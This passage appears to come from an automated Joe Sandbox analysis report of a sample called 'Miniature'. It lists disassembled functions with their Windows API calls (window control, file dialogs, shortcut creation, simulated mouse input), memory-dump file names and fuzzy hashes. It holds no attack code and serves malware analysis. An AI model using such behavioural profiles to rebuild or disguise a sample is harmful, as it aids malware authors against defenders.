                                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(00C70354,00000000), ref: 00C70179
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(00C70354), ref: 00C7019D
                                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(00C70354,00000000), ref: 00C701A1
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C701AB
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f42d7c214422aef0a2c8de2f056b4b0d75c79577a1ab3f40fc74543702553f53
                                                                                                                                                                                                                                                                                            • Instruction ID: 7e71ba3ac8d684dd2e2c34c94a4c4763e9ffabd47fa74f34d9a85d6f6c73c680
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f42d7c214422aef0a2c8de2f056b4b0d75c79577a1ab3f40fc74543702553f53
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B651D432610310EACF20AB65D899B6DB7A5AF46310F34D446F80EEF297DB709C40EB56
                                                                                                                                                                                                                                                                                            Function 00C89B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C141EA: _wcslen.LIBCMT ref: 00C141EF
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C18577: _wcslen.LIBCMT ref: 00C1858A
                                                                                                                                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00C89F2A
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C89F4B
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C89F72
                                                                                                                                                                                                                                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00C89FCA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                                                                            • String ID: X
                                                                                                                                                                                                                                                                                            • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                                                                            • Opcode ID: 37eaa8451dcefc667224f3e315aee061a1f44c278b4534df041a30c533e6955c
                                                                                                                                                                                                                                                                                            • Instruction ID: 99b031cc01a5244218db95068fe0d0e4b2042d5d76e86166bd698ea84afbe355
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37eaa8451dcefc667224f3e315aee061a1f44c278b4534df041a30c533e6955c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8CE19231508340DFD714EF24C881AAAB7E0FF85318F18856DF89A8B2A2DB31DD45DB96
                                                                                                                                                                                                                                                                                            Function 00C86ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C86F21
                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00C8707E
                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00CB0CC4,00000000,00000001,00CB0B34,?), ref: 00C87095
                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00C87319
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                            • String ID: .lnk
                                                                                                                                                                                                                                                                                            • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                            • Opcode ID: 7cf68e01d8460b6ede3cc044065e10ef629974f9d16a34a59af8e24e569d5623
                                                                                                                                                                                                                                                                                            • Instruction ID: 075532b961f1de90fd6c9d88961e47249218e7a200376e32fd928ca7675c1e74
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7cf68e01d8460b6ede3cc044065e10ef629974f9d16a34a59af8e24e569d5623
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2D14B71508201AFC304EF24C881EABB7E8FF95708F50496DF59687262EB71ED49DB92
                                                                                                                                                                                                                                                                                            Function 00C11B00 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C124B0
                                                                                                                                                                                                                                                                                            • BeginPaint.USER32(?,?,?), ref: 00C11B35
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C11B99
                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00C11BB6
                                                                                                                                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C11BC7
                                                                                                                                                                                                                                                                                            • EndPaint.USER32(?,?,?,?,?), ref: 00C11C15
                                                                                                                                                                                                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00C53287
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C11C2D: BeginPath.GDI32(00000000), ref: 00C11C4B
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3050599898-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a83bd0654e93bb2d55e8525aadfaac7ad8e94ab26f30f34ed1874353e8aa94f4
                                                                                                                                                                                                                                                                                            • Instruction ID: f590383d44878a91a15579aad4e1e1c5e9a462b6af19ef5a606af3ce9ee1f289
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a83bd0654e93bb2d55e8525aadfaac7ad8e94ab26f30f34ed1874353e8aa94f4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B741C370205340AFC710DF24DCC4FBA7BA8EF46324F180669FA658B1A2C7349985EB61
                                                                                                                                                                                                                                                                                            Function 00C81196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C811B3
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00C811EE
                                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00C8120A
                                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00C81283
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00C8129A
                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C812C8
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 984805d86882ccef9f7a491763dc7d8dea612221a9955be85651489103f67f07
                                                                                                                                                                                                                                                                                            • Instruction ID: dc5b94c025c930bd28106c1bd03b86306efed5958001cb6f489a6e76cf7f4fb3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 984805d86882ccef9f7a491763dc7d8dea612221a9955be85651489103f67f07
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43416772900205AFDF04AF54DC85BAEB7B8FF04314F1480A5EE01AB296DB30DE61DBA4
                                                                                                                                                                                                                                                                                            Function 00CA8C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00C6FBEF,00000000,?,?,00000000,?,00C539E2,00000004,00000000,00000000), ref: 00CA8CA7
                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 00CA8CCD
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00CA8D2C
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00CA8D40
                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00CA8D66
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00CA8D8A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 642888154-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 07c2a815711e485f9fdd2cd3e5565ba5d79de87c1524d44b1a95b5a80bd81a02
                                                                                                                                                                                                                                                                                            • Instruction ID: c1e4d849fc3900f836c72a732d430daeff7685d0f170117f41524f920c5a16a4
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07c2a815711e485f9fdd2cd3e5565ba5d79de87c1524d44b1a95b5a80bd81a02
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19418330601256AFDB25DF24C889BA57BF1FB4731CF1850A9E5198F2A2CB31A949CF60
                                                                                                                                                                                                                                                                                            Function 00C92D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(?,?,00000000), ref: 00C92D45
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C8EF33: GetWindowRect.USER32(?,?), ref: 00C8EF4B
                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00C92D6F
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00C92D76
                                                                                                                                                                                                                                                                                            • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00C92DB2
                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00C92DDE
                                                                                                                                                                                                                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C92E3C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                                            • Opcode ID: cb37bdd49cf4633fb11c239613668a5296c0a36e029ba6649b9c9cab0570db24
                                                                                                                                                                                                                                                                                            • Instruction ID: a488de1620e59a2938bb48d3ff73b0bbab755ae59837c4b680945b5d31ffa184
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb37bdd49cf4633fb11c239613668a5296c0a36e029ba6649b9c9cab0570db24
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1531E272505315AFCB20DF14C849F9BB7A9FF85318F000919F49AA7191DB30EA49CBD2
                                                                                                                                                                                                                                                                                            Function 00C755E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 00C755F9
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C75616
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C7564E
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7566C
                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C75674
                                                                                                                                                                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00C7567E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 72514467-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 4729ebf2a14e665f9f59040dd31bcc9d7c1646835a4241d8fe46611b22287a91
                                                                                                                                                                                                                                                                                            • Instruction ID: 02c2323b2fcf68ecbe2d4ef1cf0bb0306c223d3a8ca66b79b774a220176bb2d2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4729ebf2a14e665f9f59040dd31bcc9d7c1646835a4241d8fe46611b22287a91
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 512108722046007BEB155B35DC49FBF7BACEF45750F14C029F90ACA191EFA1DD419660
                                                                                                                                                                                                                                                                                            Function 00C86263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C155D1,?,?,00C54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C15871
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C862C0
                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00C863DA
                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00CB0CC4,00000000,00000001,00CB0B34,?), ref: 00C863F3
                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00C86411
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                                            • String ID: .lnk
                                                                                                                                                                                                                                                                                            • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                                            • Opcode ID: ba0d24b5fae5dcc3c562cc7b476d39c95bb0ac612da3f2092434a71be441ad1d
                                                                                                                                                                                                                                                                                            • Instruction ID: 88de26d8c79ce5ee5ccad7ac9463874103fc8815085cbc3921b264637cf85af4
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba0d24b5fae5dcc3c562cc7b476d39c95bb0ac612da3f2092434a71be441ad1d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AED16274A082019FC714EF24C484A6EBBE5FF8A718F10885CF8969B361CB31ED45DB92
                                                                                                                                                                                                                                                                                            Function 00CA86FC Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00CA8740
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00CA8765
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00CA877D
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00CA87A6
                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00C8C1F2,00000000), ref: 00CA87C6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C124B0
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00CA87B1
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2294984445-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b21400dd2b216d6f70395353b3d70ab841d88fff257bb360d9db31f478636dee
                                                                                                                                                                                                                                                                                            • Instruction ID: c9f0a5d5e563606df120e784e24098cdd0102974ea156a353d203a778babdf97
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b21400dd2b216d6f70395353b3d70ab841d88fff257bb360d9db31f478636dee
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD2160716102429FCB149F39CC48B6E3BA5EB46369F254A29F977C75E0EE308954DB10
                                                                                                                                                                                                                                                                                            Function 00C336F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00C336E9,00C33355), ref: 00C33700
                                                                                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C3370E
                                                                                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C33727
                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00C336E9,00C33355), ref: 00C33779
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 67f06e35a37c32cbf0351caa622a7f3f446b1116e465d1cae0958bed4913480d
